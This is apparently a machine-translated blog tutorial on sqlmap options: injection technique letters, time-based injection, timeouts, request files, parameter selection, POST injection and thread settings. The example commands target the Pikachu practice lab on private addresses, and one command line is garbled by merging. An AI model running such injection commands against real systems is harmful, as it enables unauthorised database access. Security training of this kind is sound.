当前位置:网站首页>Sqlmap tutorial (III) practical skills II
Sqlmap tutorial (III) practical skills II
2022-07-06 05:58:00 【A τθ】
One 、–technique Use the specified injection method
In some projects , It is inevitable that the network will react slowly ,idc And testing sqlmap The ability of . As a professional penetration tester , We must be fast, accurate and ruthless .
There are some SQL The injection point only allows time injection , It is designated at this time SQLMAP The injection type of is T
Here are --technique Explanation of the value of the parameter :
B:Boolean-basedblindSQLinjection( Boolean Injection )
E:Error-basedSQLinjection( Error reporting injection )
U:UNIONquerySQLinjection( Query injection can be combined )
S:StackedqueriesSQLinjection( Multi statement query injection )
T:Time-basedblindSQLinjection( Injection based on time delay )
Q:InlineSQLInjection( Inline Injection )
Two 、 Use time-based delay injection
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=T
Support multiple injection detection , The default is all :
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=BEUT
3、 ... and 、 Set timeout
--time-out This parameter is to set the timeout Some web pages are slow to respond , You can use this parameter to increase the access timeout time . The default is 30
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --timeout=10
Four 、 Read text for SQL Injection detection
sqlmap -r post.txt
5、 ... and 、 Specify parameters to inject
-p Specify the parameters to be tested
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1
Use * For injection
If url When it is pseudo static , have access to * No. indicates that this is the place of detection ;
sqlmap -u "http://192.168.0.103/06/vul/sqli/id/1*./html POST Inject sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_id.php" --data "id=1&submit=1" -p id -v 1
6、 ... and 、 Modify the default maximum thread size
sqlmap/lib/core/settings.py
The default maximum thread is 10 You can set the maximum number of threads to 100
MAX_NUMBER_OF_THREADS = 100
边栏推荐
- CoDeSys note 2: set coil and reset coil
- Query the standard text code corresponding to a work center (s) in the production order
- Hongliao Technology: how to quickly improve Tiktok store
- B站刘二大人-线性回归 Pytorch
- Construction of yolox based on paste framework
- Report on market depth analysis and future trend prediction of China's arsenic trioxide industry from 2022 to 2028
- 【SQL server速成之路】——身份驗證及建立和管理用戶賬戶
- 如何在业务代码中使用 ThinkPHP5.1 封装的容器内反射方法
- Raised a kitten
- 类和对象(一)this指针详解
猜你喜欢
The digital economy has broken through the waves. Is Ltd a Web3.0 website with independent rights and interests?
Practice sharing: how to safely and quickly migrate from CentOS to openeuler
Redis message queue
Redis消息队列
华为BFD的配置规范
(column 22) typical column questions of C language: delete the specified letters in the string.
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Huawei BFD configuration specification
LTE CSFB process
B站刘二大人-反向传播
随机推荐
Sequoiadb Lake warehouse integrated distributed database, June 2022 issue
IDEA 新UI使用
High quality coding tool clion
Garbage collector with serial, throughput priority and response time priority
Database: ODBC remote access SQL Server2008 in oracel
The difference and usage between continue and break
Novice entry SCM must understand those things
ContentType的作用
AUTOSAR from getting started to becoming proficient (10) - embedded S19 file analysis
华为BFD的配置规范
Yygh-11-timing statistics
HCIA review
What preparations should be made for website server migration?
初识数据库
如何在业务代码中使用 ThinkPHP5.1 封装的容器内反射方法
Wib3.0 leapfrogging, in leapfrogging (ง • ̀_•́) ง
Redistemplate common collection instructions opsforvalue (II)
Cognitive introspection
Pay attention to the details of pytoch code, and it is easy to make mistakes
Report on market depth analysis and future trend prediction of China's arsenic trioxide industry from 2022 to 2028